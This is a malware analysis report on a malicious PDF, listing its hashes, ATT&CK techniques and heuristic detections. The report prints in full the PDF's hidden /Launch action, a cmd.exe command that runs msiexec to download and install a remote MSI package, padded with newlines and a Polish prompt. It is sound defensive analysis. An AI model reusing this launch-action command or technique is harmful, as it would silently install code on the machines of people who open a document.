PDF malware analysis — malicious · 470f249283141b22

MALICIOUS

PDF

1.1 KB

MD5: 8f0833a037fefaee470cb8f6ab4ccbdf SHA-1: 9914ff95d33ce7ec54c8ab1f0182f1b7a449fab6 SHA-256: 470f249283141b2267068f6b28e5a767ff5750af0c780a928f79890e614f23c1

120 Risk Score

Malware Insights

MITRE ATT&CK

T1204.002 Malicious File T1059.003 Windows Command Shell

The PDF file contains a launch action that executes cmd.exe with parameters to download and install an MSI package from a provided URL. This indicates a delivery mechanism for potentially malicious software, disguised as a legitimate installer. The command executed is 'cmd.exe /Q /C start msiexec /i http://ovh.dl.sourceforge.net/project/axcrypt/AxCrypt%20Beta/1.7/AxCrypt-1.7.2067.0-Win32-en-US-Beta.msi'.

Heuristics 3

Launch action critical PDF_LAUNCH

PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
/Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND

PDF /Launch action specifies an executable target with parameters '/Q /C start msiexec /i http://ovh.dl.sourceforge.net/project/axcrypt/AxCrypt%20Beta/1.7/AxCrypt-1.7.2067.0-Win32-en-US-Beta.msi\n\n\n\n\n\n\n\n\nUwaga!\nNacisnij cos\n' — references a known-dangerous executable (cmd, PowerShell, etc.).
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://ovh.dl.sourceforge.net/project/axcrypt/AxCrypt%20Beta/1.7/AxCrypt-1.7.2067.0-Win32-en-US-Beta.msi\n\n\n\n\n\n\n\n\nUwaga!\nNacisnij

Open this report in the interactive analyzer, or submit your own file for analysis.